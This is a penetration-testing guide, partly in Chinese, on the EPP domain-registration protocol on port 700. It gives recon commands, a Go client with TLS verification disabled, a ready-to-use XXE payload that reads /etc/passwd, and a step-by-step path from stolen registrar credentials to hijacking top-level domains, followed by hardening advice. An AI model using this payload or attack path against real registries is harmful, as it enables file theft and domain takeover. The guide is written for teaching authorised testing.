700 - Epp

💡 学习提示: 本文档介绍 700 - EPP 的渗透测试方法,适合信息安全初学者和从业人员参考。

⚠️ 法律声明: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。

⚠️ 法律声明: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。

700 - 渗透测试 EPP

基本信息

The Extensible Provisioning 协议 (EPP) is a network protocol used for the management of domain names and other internet resources by domain name registries and registrars. It enables the automation of domain name registration, renewal, transfer, and deletion processes, ensuring a standardized and secure communication framework between different entities in the domain name system (DNS). EPP is designed to be flexible and extensible, allowing for the addition of new features and commands as the needs of the internet infrastructure evolve.

Basically, it’s one of the protocols a TLD registrar is going to be offering to domain registrars to register new domains in the TLD.

Pentest

In this very interesting article you can see how some security researches found several implementation of this protocol were vulnerable to XXE (XML External Entity) as this protocol uses XML to communicate, which would have allowed attackers to takeover tens of different TLDs.

信息收集 & Recon

EPP servers almost always listen on TCP 700/tcp over TLS. A typical deployment also enforces mutual-TLS (mTLS) so the client must present a valid certificate issued by the registry CA. Nevertheless, many private test or pre-production deployments forget that control:

## Banner-grabbing / TLS inspection
nmap -p700 --script ssl-cert,ssl-enum-ciphers <target>

## Check if mTLS is *really* required (it frequently is not!)
openssl s_client -connect <target>:700 -quiet \
  -servername epp.test 2>/dev/null | head

If the server does not terminate the connection after the TLS handshake you can attempt to send an unauthenticated <hello/> message:

<?xml version="1.0" encoding="UTF-8"?>
<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
  <hello/>
</epp>

Open-source clients useful for testing

  • epp-client (Go) – actively maintained, supports TCP/TLS and EPP-over-HTTPS (RFC 8730):
    go install github.com/domainr/epp/cmd/epp@latest
  • gandi/go-epp – minimal client library that can easily be instrumented for fuzzing or nuclei-style workflows.
  • afq984/php-epp-client – PHP implementation used by many small registrars; a convenient target for code-review.

示例 minimal login+check script with Go epp-client:

package main
import (
    "github.com/domainr/epp"
    "crypto/tls"
)

func main() {
    cfg := &tls.Config{InsecureSkipVerify: true}
    c, _ := epp.DialTLS("epp.test:700", cfg)
    c.Login("CLIENT_ID", "PASSWORD", nil)
    resp, _ := c.DomainCheck("example","com")
    println(resp)
}

Common Weaknesses & 2023-2025 Vulnerabilities

Year Component CWE Impact
2023 CoCCA Registry < 3.5 CWE-611 XXE Remote file read & SSRF via crafted <epp> payload (patch: 2023-11-02)
2024 FRED EPP 服务器 2.x CWE-322 Insufficient TLS cert validation Bypass of mTLS allowed unauthorized registrar login
2025 Proprietary registrar panel CWE-306 Missing 认证 for Critical Function Domain transfer approval endpoint exposed over EPP-HTTP bridge

XXE / SSRF payload (works against many Java/Spring implementations)

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
  <command>
    <check>
      <domain:check xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
        <domain:name>&xxe;</domain:name>
      </domain:check>
    </check>
  </command>
</epp>

When the parser is mis-configured (XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES=true) the file content is returned inside the <resData> structure.

Other typical findings

  1. Weak credential policy – EPP login passphrases shorter than 8 chars; brute-force is often feasible because the spec only RECOMMENDS (not requires) rate-limiting.
  2. Missing registryLock / serverUpdateProhibited status – once authenticated, attackers can immediately update NS records and steal traffic.
  3. Unsigned poll messages – some implementations still do not sign poll Q&A messages, enabling spoofing/phishing of registrar operators.

攻击 Path: From Zero to TLD Hijack

  1. Discover an EPP endpoint (often hidden behind a generic host like ot&e.<tld>.nic.<cc>).
  2. Abuse one of the weaknesses above to gain registrar-level credentials (XXE → SSRF to IMDSv1, credential exfil, or TLS-bypass).
  3. Issue <update> requests to change the domain’s hostObj records to attacker-controlled name servers.
  4. (Optional) Submit a <transfer> to move the domain to an attacker-controlled registrar – many registries still rely on a single auth-code.
  5. Profit: full control of DNS zone, ability to request TLS certificates via ACME.

Defensive Measures & Hardening

  • Enforce mTLS with per-registrar client certificates and pin the registry CA.
  • Set parserFeature secure-processing=true or equivalent to kill XXE.
  • Run continuous fuzzing of the XML parser (e.g., with go-fuzz or jazzer for Java).
  • Deploy Registry Lock / server*Prohibited statuses for high-value domains.
  • Monitor poll queue for suspicious <transfer> or <update> commands and alert in real-time.
  • ICANN 2024 DNS-Abuse contract amendments require registries to prove rate-limit & auth controls – leverage them.

搜索引擎语法

FOFA

# FOFA 搜索语法
port="700"

Shodan

# Shodan 搜索语法
port:700

ZoomEye

# ZoomEye 搜索语法
port:700

📖 参考资料